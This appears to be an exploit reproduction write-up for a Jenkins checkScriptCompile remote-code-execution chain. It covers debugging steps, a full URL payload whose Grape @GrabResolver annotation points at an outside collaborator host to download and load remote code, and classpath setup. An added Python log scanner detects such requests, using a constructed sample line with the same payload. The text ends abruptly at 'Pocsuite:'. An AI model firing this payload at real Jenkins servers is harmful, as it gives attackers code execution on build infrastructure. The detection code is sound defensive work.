First, visit
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
without a value parameter, then step into
workflow-cps.jar!\org\jenkinsci\plugins\workflow\cps\CpsFlowDefinition$DescriptorImpl#doCheckScriptCompile(@QueryParameter String value)
and observe that a NullPointerException is thrown.
Now pass value=shadowsock5
and continue debugging:
Step into:
groovy-all-2.4.12.jar!\groovy\lang\GroovyClassLoader#parseClass(String text)
Next, try this payload:
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27test%27,%20root=%27http://3mqe92c2mowxdgiek3d7hpbvdmjc71.burpcollaborator.net%27)%0A@Grab(group=%27package%27,%20module=%27vultestvultest%27,%20version=%271%27)%0Aimport%20Payload;
The class org.apache.ivy.Ivy is not found.
Does this package need to be placed on Jenkins's classpath?
Searching suggests that a plugin is missing:
Install version 1.28:
http://ftp-chi.osuosl.org/pub/jenkins/plugins/ivy/1.28/ivy.hpi
It later turns out that the plugins bundling Ivy require newer versions of other plugins, and it is exactly those plugins' vulnerabilities that the exploit depends on. So the Ivy jar:
/home/77/.jenkins/plugins/ivy/WEB-INF/lib/ivy-2.1.0.jar
is added to the classpath manually:
/usr/lib/jvm/java-8-oracle/bin/java -Djava.util.logging.config.file=/home/77/repos/tomcat-8.0.38/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -agentlib:jdwp=transport=dt_socket,address=0.0.0.0:8000,server=y,suspend=n -Djava.endorsed.dirs=/home/77/repos/tomcat-8.0.38/endorsed -classpath /home/77/repos/tomcat-8.0.38/bin/bootstrap.jar:/home/77/repos/tomcat-8.0.38/bin/tomcat-juli.jar:/home/77/.jenkins/plugins/ivy/WEB-INF/lib/ivy-2.1.0.jar -Dcatalina.base=/home/77/repos/tomcat-8.0.38 -Dcatalina.home=/home/77/repos/tomcat-8.0.38 -Djava.io.tmpdir=/home/77/repos/tomcat-8.0.38/temp org.apache.catalina.startup.Bootstrap start
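On the detection side, as an added example that is not part of the original writeup: the Python below scans web-server access log lines for requests to the checkScriptCompile endpoint whose value parameter carries Grape annotations (@Grab, @GrabResolver, @GrabConfig), and extracts the resolver root so the remote host can be investigated or blocked. The log lines and the attacker.invalid host are constructed; the endpoint path pattern is the one exercised above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Grape annotations that make the Groovy compiler fetch remote dependencies
GRAPE_ANNOTATIONS = ("@Grab", "@GrabResolver", "@GrabConfig")

# Stapler form-validation endpoint reached in the request above
ENDPOINT_RE = re.compile(r"/descriptorByName/[^/]+/checkScriptCompile")

# Request line inside a combined-format access log entry
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Feb/2019:10:00:01 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27t%27,%20root=%27http://attacker.invalid%27)%0A@Grab(group=%27p%27,%20module=%27m%27,%20version=%271%27)%0Aimport%20Payload; HTTP/1.1" 200 12',
    '10.0.0.6 - - [12/Feb/2019:10:00:02 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=println%20%27hi%27 HTTP/1.1" 200 12',
    '10.0.0.7 - - [12/Feb/2019:10:00:03 +0000] "GET /jenkins/job/foo/build HTTP/1.1" 302 0',
]


def grape_hits(log_lines):
    """Return (client_ip, annotations_found, resolver_root) for each
    checkScriptCompile request whose script uses Grape annotations."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not ENDPOINT_RE.search(parts.path):
            continue
        # parse_qs percent-decodes the submitted Groovy source for us
        script = "\n".join(parse_qs(parts.query).get("value", []))
        found = [a for a in GRAPE_ANNOTATIONS
                 if re.search(re.escape(a) + r"\b", script)]
        if not found:
            continue
        root = re.search(r"root\s*=\s*'([^']+)'", script)
        hits.append((line.split()[0], found, root.group(1) if root else None))
    return hits


if __name__ == "__main__":
    for ip, annotations, root in grape_hits(SAMPLE_LOG):
        print(f"{ip}: {', '.join(annotations)} resolver root={root}")
```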
Pocsuite: